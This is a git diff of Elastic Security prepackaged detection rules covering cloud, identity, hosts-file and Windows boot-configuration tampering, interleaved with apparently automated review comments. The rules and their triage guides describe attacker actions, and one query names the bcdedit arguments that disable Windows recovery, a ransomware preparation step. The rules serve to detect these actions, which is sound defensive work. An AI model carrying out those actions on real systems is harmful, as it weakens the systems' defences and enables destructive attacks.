- "description": "Identifies when a Virtual Private Cloud (VPC) route is deleted in Google Cloud Platform (GCP). Google Cloud routes define the paths that network traffic takes from a virtual machine (VM) instance to other destinations. These destinations can be inside a Google VPC network or outside it. An adversary may delete a route in order to impact the flow of network traffic in their target's cloud environment.",
- "false_positives": [
- "Virtual Private Cloud routes may be deleted by system administrators. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior."
- ],
- "index": [
- "filebeat-*",
- "logs-gcp*"
- ],
- "language": "kuery",
- "license": "Elastic License v2",
- "name": "GCP Virtual Private Cloud Route Deletion",
- "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
- "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:v*.compute.routes.delete and event.outcome:success\n",
- "references": [
- "https://cloud.google.com/vpc/docs/routes",
- "https://cloud.google.com/vpc/docs/using-routes"
- ],
- "risk_score": 47,
- "rule_id": "a17bcc91-297b-459b-b5ce-bc7460d8f82a",
- "severity": "medium",
- "tags": [
- "Elastic",
- "Cloud",
- "GCP",
- "Continuous Monitoring",
- "SecOps",
- "Configuration Audit"
- ],
- "timestamp_override": "event.ingested",
- "type": "query",
- "version": 5
-}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_google_workspace_admin_role_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_google_workspace_admin_role_deletion.json
new file mode 100644
index 0000000000000..435a9ca203d24
--- /dev/null
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_google_workspace_admin_role_deletion.json
@@ -0,0 +1,84 @@
+{
+ "author": [
+ "Elastic"
+ ],
+ "description": "Detects when a custom admin role is deleted. An adversary may delete a custom admin role in order to impact the permissions or capabilities of system administrators.",
+ "false_positives": [
+ "Google Workspace admin roles may be deleted by system administrators. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior."
+ ],
+ "from": "now-130m",
+ "index": [
+ "filebeat-*",
+ "logs-google_workspace*"
+ ],
+ "interval": "10m",
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "name": "Google Workspace Admin Role Deletion",
+ "note": "### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). 
Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html",
+ "query": "event.dataset:google_workspace.admin and event.provider:admin and event.category:iam and event.action:DELETE_ROLE\n",
+ "references": [
+ "https://support.google.com/a/answer/2406043?hl=en"
+ ],
+ "related_integrations": [
+ {
+ "package": "google_workspace",
+ "version": "1.2.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.provider",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "93e63c3e-4154-4fc6-9f86-b411e0987bbf",
+ "setup": "The Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "severity": "medium",
+ "tags": [
+ "Elastic",
+ "Cloud",
+ "Google Workspace",
+ "Continuous Monitoring",
+ "SecOps",
+ "Identity and Access",
+ "Impact"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0040",
+ "name": "Impact",
+ "reference": "https://attack.mitre.org/tactics/TA0040/"
+ },
+ "technique": [
+ {
+ "id": "T1531",
+ "name": "Account Access Removal",
+ "reference": "https://attack.mitre.org/techniques/T1531/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "query",
+ "version": 14
+}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_google_workspace_mfa_enforcement_disabled.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_google_workspace_mfa_enforcement_disabled.json
new file mode 100644
index 0000000000000..03ba59c239969
--- /dev/null
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_google_workspace_mfa_enforcement_disabled.json
@@ -0,0 +1,89 @@ +{ + "author": [ + "Elastic" + ], + "description": "Detects when multi-factor authentication (MFA) enforcement is disabled for Google Workspace users. An adversary may disable MFA enforcement in order to weaken an organization\u2019s security controls.", + "false_positives": [ + "MFA policies may be modified by system administrators. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-130m", + "index": [ + "filebeat-*", + "logs-google_workspace*" + ], + "interval": "10m", + "language": "kuery", + "license": "Elastic License v2", + "name": "Google Workspace MFA Enforcement Disabled", + "note": "## Triage and analysis\n\n### Investigating Google Workspace MFA Enforcement Disabled\n\nMulti-factor authentication is a process in which users are prompted during the sign-in process for an additional form\nof identification, such as a code on their cellphone or a fingerprint scan.\n\nIf you only use a password to authenticate a user, it leaves an insecure vector for attack. If the password is weak or\nhas been exposed elsewhere, an attacker could be using it to gain access. When you require a second form of authentication,\nsecurity is increased because this additional factor isn't something that's easy for an attacker to obtain or duplicate.\n\nFor more information about using MFA in Google Workspace, access the [official documentation](https://support.google.com/a/answer/175197).\n\nThis rule identifies the disabling of MFA enforcement in Google Workspace. 
This modification weakens the security of\nthe accounts and can lead to the compromise of accounts and other assets.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account and resource owners and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- While this activity can be done by administrators, all users must use MFA. The security team should address any\npotential benign true positive (B-TP), as this configuration can risk the user and domain.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. 
Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Reactivate the multi-factor authentication enforcement.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). 
Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "query": "event.dataset:google_workspace.admin and event.provider:admin\n and event.category:iam and event.action:ENFORCE_STRONG_AUTHENTICATION\n and google_workspace.admin.new_value:false\n", + "references": [ + "https://support.google.com/a/answer/9176657?hl=en#" + ], + "related_integrations": [ + { + "package": "google_workspace", + "version": "1.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "google_workspace.admin.new_value", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "cad4500a-abd7-4ef3-b5d3-95524de7cfe1", + "setup": "The Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Elastic", + "Cloud", + "Google Workspace", + "Continuous Monitoring", + "SecOps", + "Configuration Audit", + "Impact" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1531", + "name": "Account Access Removal", + "reference": "https://attack.mitre.org/techniques/T1531/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 15 +} 
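Review bot: The single entry in `references` carries a stray trailing `#` — `https://support.google.com/a/answer/9176657?hl=en#` — which should read `"https://support.google.com/a/answer/9176657?hl=en"`. Separately, the `threat` block files this rule under T1531 Account Access Removal; disabling MFA enforcement does not remove anyone's access but weakens the authentication control, so T1556 Modify Authentication Process (sub-technique T1556.006, Multi-Factor Authentication) looks like the closer fit, though I would confirm against the convention the sibling Google Workspace rules follow. The rest of the new file is internally consistent: `"from": "now-130m"` and `"interval": "10m"` match the lag-time paragraph in `note`, and every field the KQL query reads (`event.dataset`, `event.provider`, `event.category`, `event.action`, `google_workspace.admin.new_value`) appears in `required_fields`.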
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_hosts_file_modified.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_hosts_file_modified.json index 790c4092ae58f..80f15f40cb8ab 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_hosts_file_modified.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_hosts_file_modified.json 
@@ -13,13 +13,41 @@ "language": "eql", "license": "Elastic License v2", "name": "Hosts File Modified", - "note": "## Config\n\nFor Windows systems using Auditbeat, this rule requires adding `C:/Windows/System32/drivers/etc` as an additional path in the 'file_integrity' module of auditbeat.yml.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "any where\n\n /* file events for creation; file change events are not captured by some of the included sources for linux and so may\n miss this, which is the purpose of the process + command line args logic below */\n (\n event.category == \"file\" and event.type in (\"change\", \"creation\") and\n file.path : (\"/private/etc/hosts\", \"/etc/hosts\", \"?:\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\hosts\")\n )\n or\n\n /* process events for change targeting linux only */\n (\n event.category == \"process\" and event.type in (\"start\") and\n process.name in (\"nano\", \"vim\", \"vi\", \"emacs\", \"echo\", \"sed\") and\n process.args : (\"/etc/hosts\")\n )\n", "references": [ "https://www.elastic.co/guide/en/beats/auditbeat/current/auditbeat-reference-yml.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "9c260313-c811-4ec8-ab89-8f6530e0246c", + "setup": "For Windows systems using Auditbeat, this rule requires adding `C:/Windows/System32/drivers/etc` as an additional path in the 'file_integrity' 
module of auditbeat.yml.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -58,5 +86,5 @@ "timeline_title": "Comprehensive File Timeline", "timestamp_override": "event.ingested", "type": "eql", - "version": 9 + "version": 11 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_iam_deactivate_mfa_device.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_iam_deactivate_mfa_device.json index cb4f1a15cd337..1bd09096e9ea2 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_iam_deactivate_mfa_device.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_iam_deactivate_mfa_device.json 
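Review bot: The investigation guide is blanked to `"note": ""` rather than removed now that its content has moved to `setup`; an empty string is still serialized and shown as a present-but-blank field, so unless the rule loader requires the key, dropping the `note` line is cleaner — worth confirming whether the schema treats a missing and an empty `note` identically. The same pattern appears in impact_iam_group_deletion, impact_kubernetes_pod_deleted, the two impact_microsoft_365_* rules and the two impact_okta_attempt_to_*_okta_application rules in this diff. The move itself is sound: `setup` is the previous `## Config` body verbatim with the heading stripped, and the new `required_fields` list covers exactly the five fields the EQL query reads (`event.category`, `event.type`, `file.path`, `process.args`, `process.name`). The second hunk is only the version bump.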
@@ -16,14 +16,44 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS IAM Deactivation of MFA Device", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "## Triage and analysis\n\n### Investigating AWS IAM Deactivation of MFA Device\n\nMulti-factor authentication (MFA) in AWS is a simple best practice that adds an extra layer of protection on top of your\nuser name and password. With MFA enabled, when a user signs in to an AWS Management Console, they will be prompted for\ntheir user name and password (the first factor\u2014what they know), as well as for an authentication code from their AWS MFA\ndevice (the second factor\u2014what they have). Taken together, these multiple factors provide increased security for your\nAWS account settings and resources.\n\nFor more information about using MFA in AWS, access the [official documentation](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa.html).\n\nThis rule looks for the deactivation or deletion of AWS MFA devices. These modifications weaken account security and can\nlead to the compromise of accounts and other assets.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account and resource owners and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- While this activity can be done by administrators, all users must use MFA. 
The security team should address any\npotential benign true positive (B-TP), as this configuration can risk the user and domain.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. 
Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Reactivate multi-factor authentication for the user.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:aws.cloudtrail and event.provider:iam.amazonaws.com and event.action:(DeactivateMFADevice or DeleteVirtualMFADevice) and event.outcome:success\n", "references": [ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/iam/deactivate-mfa-device.html", "https://docs.aws.amazon.com/IAM/latest/APIReference/API_DeactivateMFADevice.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "d8fc1cca-93ed-43c1-bbb6-c0dd3eff2958", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -52,5 +82,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } 
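Review bot: The remediation step `- Reactivate multi-factor authentication for the user.` in the new `note` covers only half of what the query matches: a `DeactivateMFADevice` can be undone by re-enabling the device, but after `DeleteVirtualMFADevice` the virtual device no longer exists and a new one has to be created and enabled. Suggest `- Re-enable the user's MFA device, or register and enable a new one if the virtual device was deleted.` so the responder is not sent looking for a device that is gone. The `related_integrations` and `required_fields` additions line up with the query's `event.dataset`, `event.provider`, `event.action` and `event.outcome` terms; the second hunk is the version bump only.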
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_iam_group_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_iam_group_deletion.json index 9aea3879d2545..43a166753e44a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_iam_group_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_iam_group_deletion.json @@ -15,14 +15,44 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS IAM Group Deletion", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:iam.amazonaws.com and event.action:DeleteGroup and event.outcome:success\n", "references": [ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/iam/delete-group.html", "https://docs.aws.amazon.com/IAM/latest/APIReference/API_DeleteGroup.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "867616ec-41e5-4edc-ada2-ab13ab45de8a", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -51,5 +81,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_kubernetes_pod_deleted.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_kubernetes_pod_deleted.json index 456eff557ccf1..c4fc874000749 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_kubernetes_pod_deleted.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_kubernetes_pod_deleted.json @@ -14,13 +14,38 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Kubernetes Pods Deleted", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/PODS/DELETE\" and \nevent.outcome:(Success or success)\n", + "note": "", + "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/PODS/DELETE\" and\nevent.outcome:(Success or success)\n", "references": [ "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes" ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "83a1931d-8136-46fc-b7b9-2db4f639e014", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", 
@@ -43,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_microsoft_365_potential_ransomware_activity.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_microsoft_365_potential_ransomware_activity.json index 14a2f6ddeb095..67ccd0a7bc413 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_microsoft_365_potential_ransomware_activity.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_microsoft_365_potential_ransomware_activity.json 
@@ -14,14 +14,48 @@ "language": "kuery", "license": "Elastic License v2", "name": "Microsoft 365 Potential ransomware activity", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n", + "note": "", "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.category:web and event.action:\"Potential ransomware activity\" and event.outcome:success\n", "references": [ "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "721999d0-7ab2-44bf-b328-6e63367b9b29", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +84,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_microsoft_365_unusual_volume_of_file_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_microsoft_365_unusual_volume_of_file_deletion.json index 1534e4ba9f75c..5bc49a76045f0 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_microsoft_365_unusual_volume_of_file_deletion.json 
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_microsoft_365_unusual_volume_of_file_deletion.json @@ -14,14 +14,48 @@ "language": "kuery", "license": "Elastic License v2", "name": "Microsoft 365 Unusual Volume of File Deletion", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n", + "note": "", "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.category:web and event.action:\"Unusual volume of file deletion\" and event.outcome:success\n", "references": [ "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "b2951150-658f-4a60-832f-a00d1e6c6745", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +84,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_modification_of_boot_config.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_modification_of_boot_config.json index 16ee71a7dc17f..b7384909cf0a9 100644 
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_modification_of_boot_config.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_modification_of_boot_config.json 
@@ -12,10 +12,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Modification of Boot Configuration", - "note": "## Triage and analysis\n\n### Investigating Modification of Boot Configuration\n\nBoot entry parameters, or boot parameters, are optional, system-specific settings that represent configuration options.\nThese are stored in a boot configuration data (BCD) store, and administrators can use utilities like `bcdedit.exe` to\nconfigure these.\n\nThis rule identifies the usage of `bcdedit.exe` to:\n\n- Disable Windows Error Recovery (recoveryenabled).\n- Ignore errors if there is a failed boot, failed shutdown, or failed checkpoint (bootstatuspolicy ignoreallfailures).\n\nThese are common steps in destructive attacks by adversaries leveraging ransomware.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check if any files on the host machine have been encrypted.\n\n### False positive analysis\n\n- The usage of these options is not inherently malicious. 
Administrators can modify these configurations to force a\nmachine to boot for troubleshooting or data recovery purposes.\n\n### Related rules\n\n- Deleting Backup Catalogs with Wbadmin - 581add16-df76-42bb-af8e-c979bfb39a59\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- If any other destructive action was identified on the host, it is recommended to prioritize the investigation and look\nfor ransomware preparation and execution activities.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and\n (process.name : \"bcdedit.exe\" or process.pe.original_file_name == \"bcdedit.exe\") and\n (process.args : \"/set\" and process.args : \"bootstatuspolicy\" and process.args : \"ignoreallfailures\") or\n (process.args : \"no\" and process.args : \"recoveryenabled\")\n", + "note": "## Triage and analysis\n\n### Investigating Modification of Boot Configuration\n\nBoot entry parameters, or boot parameters, are optional, 
system-specific settings that represent configuration options.\nThese are stored in a boot configuration data (BCD) store, and administrators can use utilities like `bcdedit.exe` to\nconfigure these.\n\nThis rule identifies the usage of `bcdedit.exe` to:\n\n- Disable Windows Error Recovery (recoveryenabled).\n- Ignore errors if there is a failed boot, failed shutdown, or failed checkpoint (bootstatuspolicy ignoreallfailures).\n\nThese are common steps in destructive attacks by adversaries leveraging ransomware.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check if any files on the host machine have been encrypted.\n\n### False positive analysis\n\n- The usage of these options is not inherently malicious. Administrators can modify these configurations to force a\nmachine to boot for troubleshooting or data recovery purposes.\n\n### Related rules\n\n- Deleting Backup Catalogs with Wbadmin - 581add16-df76-42bb-af8e-c979bfb39a59\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. 
